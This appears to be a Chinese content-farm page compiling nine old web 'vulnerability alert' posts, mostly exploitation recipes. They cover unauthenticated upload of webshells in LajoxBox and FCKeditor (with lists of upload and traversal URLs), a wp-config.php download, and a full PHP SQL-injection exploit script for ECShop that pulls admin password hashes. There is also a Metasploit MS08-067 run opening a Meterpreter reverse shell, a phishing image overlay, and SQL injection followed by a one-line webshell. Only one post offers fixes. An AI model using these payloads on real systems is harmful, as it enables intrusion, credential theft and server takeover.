永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警

“不喝白开水”通过精心收集，向本站投稿了9篇永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警，下面是小编整理后的永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警，欢迎阅读分享，希望对大家有所帮助。

篇1：永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警

漏洞描述：

1.默认数据库下载

2.后台验证不严格，存在上传漏洞，可以提交asa马

漏洞利用：

1.下载默认数据库data/#music.asa ，将#号替换成%23即可下载，

永久网络个人音乐盒LajoxBox v1.1最新上传漏洞利用漏洞预警

，

2.www.hackqing.cn/admin/inc/fileuploadcls.asp 直接访问，无登陆限制，通过上传asa马获得webshell

修补方案：

1.更改默认数据库名称，加入特殊字符限制下载。

2.给admin目录下文件加 cookies 或session验证，并对上传内容进行严格过滤，只允许上传图片格式文件。

篇2：fckeditor漏洞利用漏洞预警

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马，利用2003路径解析漏洞，也可以直接上传ASP木马，

fckeditor漏洞利用漏洞预警

，

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如：

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

篇3：FCKeditor漏洞利用总结漏洞预警

Fckeditor漏洞利用总结

查看编辑器版本

FCKeditor/_whatsnew.html

—————————————————————————————————————————————————————————————

2. Version 2.2 版本

Apache+linux 环境下在上传文件后面加个.突破！测试通过，

—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。

action=“www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=“post”>Upload a new file:

—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法

很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。

4.1：提交shell.php+空格绕过

不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。

4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。

—————————————————————————————————————————————————————————————

5. 突破建立文件夹

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

—————————————————————————————————————————————————————————————

7.常用上传地址

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)

JSP 版：

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

注意红色部分修改为FCKeditor 实际使用的脚本语言，蓝色部分可以自定义文

件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址，

—————————————————————————————————————————————————————————————

8.其他上传地址

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

一般很多站点都已删除_samples 目录，可以试试。

FCKeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。

—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址

Version 2.4.1 测试通过

修改CurrentFolder 参数使用 ../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也可以直接浏览盘符：

JSP 版本：

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

—————————————————————————————————————————————————————————————

10.爆路径漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题

影响版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述：

FCKeditor v2.4.3 中File 类别默认拒绝上传类型：

html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!

而在apache 下，因为“Apache 文件名解析缺陷漏洞”也可以利用之，另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码，其限制最为狭隘。

在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

​

篇4：WordPresswpFileManagerFileDownload漏洞利用方法漏洞预警

漏洞详解：packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

查找漏洞网站：访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download，下载wp-config，其中回显MySQL，

WordPresswpFileManagerFileDownload漏洞利用方法漏洞预警

，

篇5：ECShop2.5.x&2.6.x 注射漏洞利用漏洞预警

ECShop2.5.x&2.6.x goods_script.php 没有初始化SQL，导致注射漏洞

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:injection / admin credentials disclosure exploit

if (emptyempty($_GET['type']))     {         ...     }     elseif ($_GET['type'] == 'collection')     {         ...     }     $sql .= “ LIMIT ” . (!emptyempty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);     $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:

#!/usr/bin/php <= v2.6.2 SQL by puret_t mail: cnhackerx at 163 dot com team:hi.baidu.com/5427518dork: “Powered by ECShop” +---------------------------------------------------------------------------+ '); /**  * works with register_globals = On  */ if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:     target server (ip/hostname) path:     path to ecshop Example: php '.$argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ ');     exit; }  error_reporting(7); ini_set('max_execution_time', 0);  $host = $argv[1]; $path = $argv[2];  $resp = send; preg_match('#href=“([S]+):([a-z0-9]{32})”#', $resp, $hash);  if ($hash)     exit(“Expoilt Success!nadmin:t$hash[1]nPassword(md5):t$hash[2]n”); else    exit(“Exploit Failed!n”);  function send() {     global $host, $path;      $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';      $data = “POST ”.$path.“goods_script.php?type=”.time().“ HTTP/1.1rn”;     $data .= “Accept: */*rn”;     $data .= “Accept-Language: zh-cnrn”;     $data .= “Content-Type: application/x-www-form-urlencodedrn”;     $data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn”;     $data .= “Host: $hostrn”;     $data .= “Content-Length: ”.strlen($cmd).“rn”;     $data .= “Connection: Closernrn”;     $data .= $cmd;      $fp = fsockopen($host, 80);     fputs($fp, $data);      $resp = '';      while ($fp && !feof($fp))         $resp .= fread($fp, 1024);      return $resp; }  ?>

发布日期：2010-07.19

发布作者：Ryat  影响版本：ECShop2.5.x&2.6.x

官方地址：www.ecshop.com

篇6：MS08067漏洞漏洞预警

这个漏洞已经暴露了很久了，这里我就不说原理了我也不会，所以直接用metasploit操作一下，大牛请绕过

root@bt:~# genlist -s 10.10.10.*

10.10.10.1

10.10.10.2

10.10.10.128

10.10.10.130

10.10.10.254

root@bt:~# nmap -sS -Pn 10.10.10.128

Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:49 EDT

Nmap scan report for attacker.dvssc.com (10.10.10.128)

Host is up (0.0000060s latency).

All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

root@bt:~# nmap -sS -Pn 10.10.10.130

Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT

Nmap scan report for service.dvssc.com (10.10.10.130)

Host is up (0.011s latency).

Not shown: 985 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

777/tcp open multiling-http

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

1027/tcp open IIS

1030/tcp open iad1

1521/tcp open oracle

6002/tcp open X11:2

7001/tcp open afs3-callback

7002/tcp open afs3-prserver

8099/tcp open unknown

MAC Address: 00:0C:29:D3:08:A0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

root@bt:~#

root@bt:~# nmap --script=smb-check-vulns 10.10.10.130

Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT

Nmap scan report for service.dvssc.com (10.10.10.130)

Host is up (0.00032s latency).

Not shown: 985 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

777/tcp open multiling-http

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

1027/tcp open IIS

1030/tcp open iad1

1521/tcp open oracle

6002/tcp open X11:2

7001/tcp open afs3-callback

7002/tcp open afs3-prserver

8099/tcp open unknown

MAC Address: 00:0C:29:D3:08:A0 (VMware)

Host script. results:

| smb-check-vulns:

| MS08-067: VULNERABLE

| Conficker: Likely CLEAN

| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds

root@bt:~# msfconsole

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...

the matrix has you

follow the white rabbit.

knock, knock, Neo.

(`. ,-,

` `. ,;' /

`. ,'/ .'

`. X /.'

.-;--''--.._` ` (

.' / `

, ` ' Q '

, , `._

,.| ' `-.;_'

: . ` ; ` ` --,.._;

' ` , ) .'

`._ , ' /_

; ,''-,;' ``-

``-..__``--`

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]

+ -- --=[ 927 exploits - 499 auxiliary - 151 post

+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf >search ms08_067

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption

msf >use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) >set RHOST 10.10.10.130

RHOST =>10.10.10.130

msf exploit(ms08_067_netapi) >set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD =>windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) >show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 10.10.10.130 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process, none

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) >set LHOST 10.10.10.128

LHOST =>10.10.10.128

msf exploit(ms08_067_netapi) >exploit

[*] Started reverse handler on 10.10.10.128:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows 2003 - No Service Pack - lang:Unknown

[*] Selected Target: Windows 2003 SP0 Universal

[*] Attempting to trigger the vulnerability...

[*] Sending stage (752128 bytes) to 10.10.10.130

[*] Meterpreter session 1 opened (10.10.10.128:4444 ->10.10.10.130:3722) at 2014-04-23 01:53:59 -0400

​

篇7： XSIO漏洞漏洞预警

文章作者：aullik5

原始出处：hi.baidu.com/aullik5/blog ... a02c6785352416.html

今天要讲的这个漏洞是一个非常猥琐的漏洞，

XSIO漏洞漏洞预警

。

大部分网站都有这个漏洞，不光是百度。

什么是XSIO，为什么说它猥琐呢？

XSIO是因为没有限制图片的position属性为absolute，导致可以控制一张图片出现在网页的任意位置。

那么我们就可以用这张图片去覆盖网页上的任意一个位置，包括网站的banner，包括一个link、一个button。

这就可以导致页面破坏。而给图片设置一个链接后，很显然就可以起到一个钓鱼的作用。

XSIO漏洞：

由于对正常的HTML 标签 是没有做过滤的，所以我们可以用这些标签来实施XSIO攻击，

在百度，发blog是在一个table里，所以我们要先把table闭合掉，然后再插入合适的图片。

如以下代码：

复制内容到剪贴板

代码:

通过控制 left 和 top的值，我们就可以把这张图片覆盖到网页上的任意位置，而link 则是指向了 www.ph4nt0m.org

百度.jpg(40.08 KB)

2008-10-21 20:50

如图：匿名用户的头像被我覆盖到了banner处.

在实施具体攻击时，可以用图片覆盖link或者banner，当别人点击原本是link或button时，将跳到我们的恶意网站去。

所以说，这是一个非常猥琐的漏洞！

欲知后事如何，且听下回分解！

PS: 本次活动仅仅是个人行为，与任何组织或集体无关.

从明天开始，将进入我们的XSS之旅。

篇8：DeepSoft.com.sys.Servlet上传漏洞漏洞预警

作者:hackdn

转载注明

JSP+MSSQL的系统，国外应用广，出在注册上传上，过滤不严，修改下面POST，上传JSP

要上载的照片:

DeepSoft.com.sys.Servlet上传漏洞漏洞预警

，

文件大小没有限制，只是“*.ai,*.psd”文件可能上传后无法显示而已。“>

篇9：魔方网络摄影系统注入漏洞及利用漏洞预警

魔方网络摄影系统

注入点：/news.php?action=detail&id=[SQLi]

利用方法，第一步通过注入点获取管理员账号和密码，密码居然是明文的

第二步，后台地址为/admin.php,进去管理后台试图拿webshell

第三步，通过iis6解析漏洞，上传.asp;.jpg一句话木马

第四步, 直接连接一句话 -_,

★ 魔方网络摄影系统注入漏洞及利用和修复

★ DirCMS 任意文件读取0day漏洞预警

★ 漏洞整改报告

★ Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

★ micecms一个鸡肋漏洞及修复 附EXP漏洞预警

★ EasyTalk 微博本地文件包含漏洞漏洞预警

★ ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警

★ 规章制度执行有漏洞

★ 财务部里的漏洞

★ phpWebThings = 1.5.2 MD5 Hash恢复/文件公开远程漏洞漏洞预警